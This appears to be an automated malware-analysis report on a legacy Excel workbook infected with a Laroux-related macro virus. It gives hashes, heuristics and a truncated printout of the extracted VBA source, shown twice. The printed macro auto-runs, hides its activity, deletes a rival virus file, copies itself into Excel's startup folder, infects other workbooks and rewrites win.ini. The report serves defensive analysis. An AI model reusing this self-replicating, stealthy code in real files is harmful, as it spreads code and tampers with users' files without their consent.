Office (OLE) malware analysis — malicious · b8a9039f82072535

MALICIOUS

Office (OLE)

23.5 KB Created: 1999-09-08 05:49:21 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 808f8d5d53d417df9f0148bf33440d1b SHA-1: df4c32b842f890e6900a4fd0683a79c24fee6e26 SHA-256: b8a9039f8207253521cd1a7a2c63d277c4ff5f9f73c2e49f169a7e9e25448f36

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically an Auto_Open macro, which is a strong indicator of malicious intent. The script attempts to detect and remove a competing macro virus ('PLDT.XLS') and then proceeds to build its own payload ('CURE.XLS'), suggesting a downloader or dropper functionality. The presence of 'laroux' markers further supports its classification as a macro-based threat.

Heuristics 3

Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS

Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6163 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6163 bytes
SHA-256: `c26288a209c60126a8fa6904feffaff96093117572519d37dfd9987f84c391ac`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "cure" Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" ' use Window event because LAROUX uses SheetActivate, ' I think if they use the same one then whomever is last ' takes over processing for that event. Application.OnWindow = "check_files" End Sub Sub check_files() Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14" Application.DisplayAlerts = False ' don't ask user to verify deletes or saves Application.ScreenUpdating = False ' don't show what the virus(macro) is doing c$ = Application.StartupPath m$ = Dir(c$ & "\" & "PLDT.XLS") ' check for LAROUX file If m$ = "PLDT.XLS" Then ' lets kill this one now Workbooks("PLDT.XLS").Close (False) ' close it first Application.OnSheetActivate = "" ' clear Laroux event handler ?? Kill Application.StartupPath & "/" & "PLDT.XLS" ' delete it MsgBox "Just killed Laroux virus for you!" & Chr(13) & Chr(10) & " You're Welcome.....", 16 End If ' new code to attempt to kill LAROUX ' replace "PLDT.XLS" with "CURE.XLS" m2$ = Dir(c$ & "\" & "CURE.XLS") ' see if we already have the CURE If (m2$ = "CURE.XLS") Then p = 1 Else p = 0 With ActiveWorkbook If (ActiveWorkbook.Modules.Count > 0) Then w = 1 Else w = 0 End With whichfile = p + w * 10 Select Case whichfile Case 10 ' code to build CURE.XLS for killin XMLAROUX' n4$ = ActiveWorkbook.Name ' get active workboook name Sheets("cure").Visible = True Sheets("cure").Select ' select cure module Sheets("cure").Copy ' make a copy of it in a new sheet With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ' save current directory ChDir Application.StartupPath ' move to startup directory ActiveWindow.Visible = False ' save new workbook as CURE.XLS Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "CURE.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ ' change back to original directory Workbooks(n4$).Sheets("cure").Visible = False Application.OnWindow = "" Application.OnWindow = "CURE.XLS!check_files" Workbooks(n4$).Save Workbooks("CURE.XLS").Saved = True Case 1 ' new file to infect (no virus, need the ability to infect to spread the cure) n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name ' get name If s$ <> "cure" Then '** already has the cure?? pt$ = "c:\Winnt\win.ini" ' check win.ini for generation number t$ = "[eruc]" Open pt$ For Input As #1 b1$ = "" b0$ = "" b3$ = "" While (b1$ <> t$) And Not (EOF(1)) b0$ = b0$ & b3$ Line Input #1, b1$ b3$ = b1$ & Chr(13) & Chr(10) 'If (b1$ <> t$) Then b3$ = b1$ & Chr(13) & Chr(10) Else b3$ = b1$ Wend If Not (EOF(1)) Then Line Input #1, b1$ If Not (EOF(1)) Then ' get the rest of the file b2$ = "" While Not (EOF(1)) Line Input #1, b2$ b0$ = b0$ & b2$ & Chr(13) & Chr(10) 'If (Not EOF(1)) Then b0$ = b0$ & b2$ & Chr(13) & Chr(10) Else b0$ = b0$ & b2$ Wend End If gn = Val(b1$) If gn = 5 Then f = 0 Else f = 1 ' infectous or not Close #1 Open pt$ For Output As #2 gn = gn + 1 b0$ = b0$ & t$ & Chr(13) & Chr(10) & gn Print #2 ... (truncated)

SHA-256: c26288a209c60126a8fa6904feffaff96093117572519d37dfd9987f84c391ac

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "cure"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
      ' use Window event because LAROUX uses SheetActivate,
      ' I think if they use the same one then whomever is last
      ' takes over processing for that event.
    Application.OnWindow = "check_files"

End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.DisplayAlerts = False '** don't ask user to verify deletes or saves
    Application.ScreenUpdating = False '** don't show what the virus(macro) is doing
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PLDT.XLS")           '** check for LAROUX file
    If m$ = "PLDT.XLS" Then                   '** lets kill this one now
        Workbooks("PLDT.XLS").Close (False)   '** close it first
        Application.OnSheetActivate = ""        '** clear Laroux event handler ??
        Kill Application.StartupPath & "/" & "PLDT.XLS"  '** delete it
        MsgBox "Just killed Laroux virus for you!" & Chr(13) & Chr(10) & "       You're Welcome.....", 16
    End If
    '** new code to attempt to kill LAROUX
    '** replace "PLDT.XLS" with "CURE.XLS"
    m2$ = Dir(c$ & "\" & "CURE.XLS")      '** see if we already have the CURE
    If (m2$ = "CURE.XLS") Then p = 1 Else p = 0
    With ActiveWorkbook
       If (ActiveWorkbook.Modules.Count > 0) Then w = 1 Else w = 0
    End With
    whichfile = p + w * 10

Select Case whichfile
    Case 10            '** code to build CURE.XLS for killin XMLAROUX'
       n4$ = ActiveWorkbook.Name   '** get active workboook name
       Sheets("cure").Visible = True
       Sheets("cure").Select  '** select cure module
       Sheets("cure").Copy    '** make a copy of it in a new sheet
       With ActiveWorkbook
           .Title = ""
           .Subject = ""
           .Author = ""
           .Keywords = ""
           .Comments = ""
       End With
       newname$ = ActiveWorkbook.Name
       c4$ = CurDir()     '**  save current directory
       ChDir Application.StartupPath  '** move to startup directory
       ActiveWindow.Visible = False  '** save new workbook as CURE.XLS
       Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "CURE.XLS", FileFormat:=xlNormal _
         , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
       ChDir c4$          '** change back to original directory
       Workbooks(n4$).Sheets("cure").Visible = False
       Application.OnWindow = ""
       Application.OnWindow = "CURE.XLS!check_files"
       Workbooks(n4$).Save
       Workbooks("CURE.XLS").Saved = True
    Case 1   '** new file to infect (no virus, need the ability to infect to spread the cure)
       n4$ = ActiveWorkbook.Name
       p4$ = ActiveWorkbook.Path
       s$ = Workbooks(n4$).Sheets(1).Name  '** get name
       If s$ <> "cure" Then     '** already has the cure??
          pt$ = "c:\Winnt\win.ini"  ' check win.ini for generation number
          t$ = "[eruc]"
          Open pt$ For Input As #1
          b1$ = ""
          b0$ = ""
          b3$ = ""
          While (b1$ <> t$) And Not (EOF(1))
             b0$ = b0$ & b3$
             Line Input #1, b1$
             b3$ = b1$ & Chr(13) & Chr(10)
             'If (b1$ <> t$) Then b3$ = b1$ & Chr(13) & Chr(10) Else b3$ = b1$
          Wend
          If Not (EOF(1)) Then
             Line Input #1, b1$
             If Not (EOF(1)) Then   ' get the rest of the file
                b2$ = ""
                While Not (EOF(1))
                    Line Input #1, b2$
                    b0$ = b0$ & b2$ & Chr(13) & Chr(10)
                    'If (Not EOF(1)) Then b0$ = b0$ & b2$ & Chr(13) & Chr(10) Else b0$ = b0$ & b2$
                Wend
             End If
             gn = Val(b1$)
             If gn = 5 Then f = 0 Else f = 1  ' infectous or not
             Close #1
             Open pt$ For Output As #2
             gn = gn + 1
             b0$ = b0$ & t$ & Chr(13) & Chr(10) & gn
             Print #2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.